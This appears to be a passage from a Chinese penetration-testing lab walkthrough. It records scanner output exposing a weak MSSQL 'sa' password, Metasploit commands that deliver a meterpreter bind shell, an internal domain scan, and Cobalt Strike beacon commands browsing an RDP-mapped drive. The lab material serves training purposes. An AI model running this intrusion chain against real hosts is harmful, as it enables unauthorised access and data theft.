start infoscan 39.98.113.109:80 open 39.98.113.109:1433 open [*] alive ports len is: 2 start vulscan [*] WebTitle http://39.98.113.109 code:200 len:703 title:IIS Windows Server [+] mssql 39.98.113.109:1433:sa 1qaz!QAZ
机器18
显示MSSQL数据库存在弱口令:用户名为sa,密码为1qaz!QAZ。
1 2 3 4 5 6 7 8
use exploit/windows/mssql/mssql_payload set payload windows/x64/meterpreter/bind_tcp_uuid set rhosts 39.98.113.109 set username sa set password 1qaz!QAZ set method cmd set database master exploit
start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 172.22.8.15 is alive (icmp) Target 172.22.8.18 is alive (icmp) Target 172.22.8.46 is alive (icmp) Target 172.22.8.31 is alive [*] Icmp alive hosts len is: 4 172.22.8.31:445 open 172.22.8.18:1433 open 172.22.8.46:445 open 172.22.8.15:445 open 172.22.8.18:445 open 172.22.8.31:139 open 172.22.8.46:139 open 172.22.8.31:135 open 172.22.8.15:139 open 172.22.8.18:139 open 172.22.8.46:135 open 172.22.8.15:135 open 172.22.8.18:135 open 172.22.8.46:80 open 172.22.8.18:80 open 172.22.8.15:88 open [*] alive ports len is: 16 start vulscan [*] NetInfo [*]172.22.8.15 [->]DC01 [->]172.22.8.15 [*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC01 [*] NetInfo [*]172.22.8.46 [->]WIN2016 [->]172.22.8.46 [*] NetInfo [*]172.22.8.31 [->]WIN19-CLIENT [->]172.22.8.31 [*] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server [*] WebTitle http://172.22.8.46 code:200 len:703 title:IIS Windows Server [*] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT [*] NetInfo [*]172.22.8.18 [->]WIN-WEB [->]172.22.8.18 [->]2001:0:348b:fb58:4fb:1e6a:d89d:8e92 [*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393 [+] mssql 172.22.8.18:1433:sa 1qaz!QAZ 已完�?16/16 [*] 扫描结束,耗时: 9.8022057s
[08/04 00:22:59] beacon> shell net use [08/04 00:22:59] [*] Tasked beacon to run: net use [08/04 00:23:01] [+] host called home, sent: 38 bytes [08/04 00:23:02] [+] received output: 会记录新的网络连接。
状态 本地 远程 网络
------------------------------------------------------------------------------- \\TSCLIENT\C Microsoft Terminal Services 命令成功完成。
[08/04 00:23:29] beacon> shell dir \\TSCLIENT\C [08/04 00:23:29] [*] Tasked beacon to run: dir \\TSCLIENT\C [08/04 00:23:34] [+] host called home, sent: 47 bytes [08/04 00:23:37] [+] received output: 驱动器 \\TSCLIENT\C 中的卷没有标签。 卷的序列号是 C2C5-9D0C